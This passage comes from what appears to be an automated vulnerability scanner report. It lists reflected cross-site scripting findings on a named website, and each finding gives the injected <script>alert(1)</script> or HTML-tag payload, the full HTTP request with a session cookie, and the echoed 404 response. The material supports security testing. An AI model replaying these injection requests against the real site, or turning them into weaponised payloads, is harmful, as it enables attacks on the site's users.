<p>The requested URL /detail9cba0<script>alert(1)</script>299da5dbf39e6391f/5/rating.php?id=5&rating=5 was not found on this server.</p>
...[SNIP]...

2.3355. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f292b<script>alert(1)</script>3d11027764d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf292b<script>alert(1)</script>3d11027764d/5/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf292b<script>alert(1)</script>3d11027764d/5/rating.php was not found on this server.</p>
...[SNIP]...

2.3356. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload add31<script>alert(1)</script>208d6c7df16a16208 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/5add31<script>alert(1)</script>208d6c7df16a16208/rating.php?id=5&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5add31<script>alert(1)</script>208d6c7df16a16208/rating.php?id=5&rating=5 was not found on this server.</p>
...[SNIP]...

2.3357. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79779<script>alert(1)</script>295825983bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/579779<script>alert(1)</script>295825983bf/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/579779<script>alert(1)</script>295825983bf/rating.php was not found on this server.</p>
...[SNIP]...

2.3358. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad187<script>alert(1)</script>409c316491ff9bc59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/5/rating.phpad187<script>alert(1)</script>409c316491ff9bc59?id=5&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/rating.phpad187<script>alert(1)</script>409c316491ff9bc59?id=5&rating=5 was not found on this server.</p>
...[SNIP]...

2.3359. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 182e1<script>alert(1)</script>9eeb340b491 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/rating.php182e1<script>alert(1)</script>9eeb340b491 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/rating.php182e1<script>alert(1)</script>9eeb340b491 was not found on this server.</p>
...[SNIP]...

2.3360. http://www.resellerbase.com/detail/5/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e3d73<script>alert(1)</script>2d296e58c54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/rating.php?e3d73<script>alert(1)</script>2d296e58c54=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/rating.php?e3d73<script>alert(1)</script>2d296e58c54=1 was not found on this server.</p>
...[SNIP]...

2.3361. http://www.resellerbase.com/detail/5/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 68a70<script>alert(1)</script>315f4964c2c88a88c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/5/rating.php/68a70<script>alert(1)</script>315f4964c2c88a88c?id=5&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/rating.php/68a70<script>alert(1)</script>315f4964c2c88a88c?id=5&rating=5 was not found on this server.</p>
...[SNIP]...

2.3362. http://www.resellerbase.com/detail/5/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5643a<script>alert(1)</script>a5f86aa6a7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5643a<script>alert(1)</script>a5f86aa6a7e/5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5643a<script>alert(1)</script>a5f86aa6a7e/5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3363. http://www.resellerbase.com/detail/5/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1030a<script>alert(1)</script>374a8e5e0df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/51030a<script>alert(1)</script>374a8e5e0df/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/51030a<script>alert(1)</script>374a8e5e0df/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3364. http://www.resellerbase.com/detail/5/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3b8d6<script>alert(1)</script>eb884527faa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/search.php3b8d6<script>alert(1)</script>eb884527faa?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/search.php3b8d6<script>alert(1)</script>eb884527faa?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3365. http://www.resellerbase.com/detail/5/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 16f47<a>a9e6daaeb41 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/search.php?keyword=search...&Submit3=Search16f47<a>a9e6daaeb41&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/search.php?keyword=search...&Submit3=Search16f47<a>a9e6daaeb41&opt=2 was not found on this server.</p>
...[SNIP]...

2.3366. http://www.resellerbase.com/detail/5/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 62cf1<a>779690e0929 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/search.php?keyword=search...62cf1<a>779690e0929&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/search.php?keyword=search...62cf1<a>779690e0929&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3367. http://www.resellerbase.com/detail/5/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2f380<script>alert(1)</script>fcd471cf19d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/search.php?keyword=search...&Submit3=Search&opt=2&2f380<script>alert(1)</script>fcd471cf19d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/search.php?keyword=search...&Submit3=Search&opt=2&2f380<script>alert(1)</script>fcd471cf19d=1 was not found on this server.</p>
...[SNIP]...

2.3368. http://www.resellerbase.com/detail/5/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/5/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6e838<a>ba928c7cd3e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/search.php?keyword=search...&Submit3=Search&opt=26e838<a>ba928c7cd3e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/search.php?keyword=search...&Submit3=Search&opt=26e838<a>ba928c7cd3e was not found on this server.</p>
...[SNIP]...

2.3369. http://www.resellerbase.com/detail/5/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dbfa6<script>alert(1)</script>35cf926256a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildbfa6<script>alert(1)</script>35cf926256a/5/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildbfa6<script>alert(1)</script>35cf926256a/5/themes/ was not found on this server.</p>
...[SNIP]...

2.3370. http://www.resellerbase.com/detail/5/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8cb96<script>alert(1)</script>7ae60d572af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/58cb96<script>alert(1)</script>7ae60d572af/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3371. http://www.resellerbase.com/detail/5/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 457d0<script>alert(1)</script>249511c6f5c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes457d0<script>alert(1)</script>249511c6f5c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes457d0<script>alert(1)</script>249511c6f5c/ was not found on this server.</p>
...[SNIP]...

2.3372. http://www.resellerbase.com/detail/5/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload af13c<script>alert(1)</script>830a83e17fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/themes/?af13c<script>alert(1)</script>830a83e17fa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/themes/?af13c<script>alert(1)</script>830a83e17fa=1 was not found on this server.</p>
...[SNIP]...

2.3373. http://www.resellerbase.com/detail/5/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c62f5<script>alert(1)</script>225aff60d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc62f5<script>alert(1)</script>225aff60d5/5/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc62f5<script>alert(1)</script>225aff60d5/5/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3374. http://www.resellerbase.com/detail/5/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/5/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b23ce<script>alert(1)</script>147bf15d8ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

